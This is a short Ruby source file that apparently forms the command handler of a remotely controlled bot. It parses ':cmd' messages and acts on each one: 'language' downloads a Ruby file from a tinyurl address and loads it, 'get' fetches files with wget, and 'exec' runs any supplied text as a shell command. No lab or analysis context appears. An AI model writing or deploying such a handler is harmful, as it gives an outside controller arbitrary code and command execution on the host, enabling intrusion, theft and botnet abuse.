require 'digest/sha1'

# can't use constant as it gets redeclared when the require is done and so causes a warning
@lang_file_name="default"

def process_message message, verbose=false
	if verbose
		puts "Using language file "+@lang_file_name
		puts "Processing message: " + message
	end

	if /^:cmd ([^ ]*)( .*)$/.match(message)
		command=$1.strip
		arguments=$2.strip

		if verbose
			puts "command: " + $1 + " args: " + arguments
		end
		case command
			when "language"
				if verbose
					puts "using new language file " + arguments
				end
				filename = Digest::SHA1.hexdigest(Time.now.to_s) + ".rb"
				url="http://tinyurl.com/"+arguments
				puts "downloading "+url
				download_file url, filename
				require filename
				puts "Now using language file " + @lang_file_name
			when "ping"
				if validate_ip(arguments)
					if verbose
						puts "ping " + arguments
					end
					system("ping", "-c 2", arguments)
				end
			when "get"
				if arguments!=""
					url="http://tinyurl.com/"+arguments
					if verbose
						puts "getting file - " + url
					end
					system("wget", url)
				end
			when "exec"
				if arguments!=""
					arguments.gsub!(/&amp;/, "&")
					if verbose
						puts "executing command - " + arguments
					end
					system(arguments)
				end
			else
				puts "Unknown command"
		end
	end
end
